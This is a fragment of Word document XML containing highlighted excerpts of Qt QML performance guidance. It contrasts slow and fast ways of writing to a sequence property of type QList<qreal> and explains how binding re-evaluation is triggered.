          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>list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m_list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list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emit qrealListPropertyChanged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signals</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qrealListPropertyChanged</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private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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qreal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_list</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1A2430" w:rsidRPr="001A2430" w:rsidRDefault="00906D8E" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="001A2430" w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Важна ў сетэрах эміціраваць сігнал аб змене спісу!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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The following </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes to elements of a reference sequence in a tight loop, resulting in bad performance:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bad.qml</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QtQuick</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2.3</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example </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0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SequenceTypeExample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root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lastRenderedPageBreak/>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Component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onCompleted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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t0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new</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</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qrealListProperty</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length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100</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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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500</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i</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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> j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0</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j </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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100</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j</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qrealListProperty</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j</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j</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t1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"elapsed: "</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 milliseconds"</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId641" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property read and write in the inner loop caused by the</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"qrealListProperty[j] = j"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expression makes this code very suboptimal. Instead, something functionally equivalent but much faster would be:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// good.qml</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QtQuick</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2.3</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example </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0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SequenceTypeExample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root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Component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onCompleted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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t0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new</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someData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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1</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2.2</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3.3</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someData</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length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100</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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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500</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i</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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> j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0</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j </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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100</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j</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someData</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j</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j</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qrealListProperty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someData</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t1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"elapsed: "</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 milliseconds"</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1A2430" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secondly, a change signal for the property is emitted if any element in it changes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you have many bindings to a particular element in a sequence property, it is better to create a dynamic property which is bound to that element, and use that dynamic property as the symbol in the binding expressions instead of the sequence element, as it will only cause re-evaluation of bindings if its value changes.</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This is an unusual </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use-case</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which most clients should never hit, but is worth being aware of, in case you find yourself doing something like this:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// bad.qml</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QtQuick</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2.3</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example </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0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SequenceTypeExample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root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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> firstBinding</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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10</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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> secondBinding</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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20</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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thirdBinding</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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30</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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Component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onCompleted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t0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for</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i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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1000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i</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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i</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t1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"elapsed: "</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 milliseconds"</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Note that even though only the element at index 2 is modified in the loop, the three bindings will all be re-evaluated since the granularity of the change signal is that the entire property has changed. As such, adding an </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intermediate binding can sometimes be beneficial</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// good.qml</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QtQuick</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2.3</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example </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0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SequenceTypeExample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root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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> intermediateBinding</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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property</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> firstBinding</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intermediateBinding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10</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property</w:t>
      </w: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int</w:t>
      </w:r>
